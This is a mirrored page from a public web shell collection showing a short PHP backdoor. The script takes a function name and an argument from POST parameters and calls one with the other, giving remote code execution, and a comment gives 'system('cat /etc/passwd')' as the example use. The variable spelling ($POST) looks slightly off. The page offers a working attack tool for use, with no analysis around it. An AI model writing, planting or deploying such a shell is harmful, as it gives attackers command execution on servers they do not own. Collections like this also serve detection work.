mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
7 lines
90 B
PHP
7 lines
90 B
PHP
|
<?php
|
||
|
$_=$POST['1'];
|
||
|
$__=$POST['2'];
|
||
|
// running -> system('cat /etc/passwd');
|
||
|
$_($__);
|
||
|
?>
|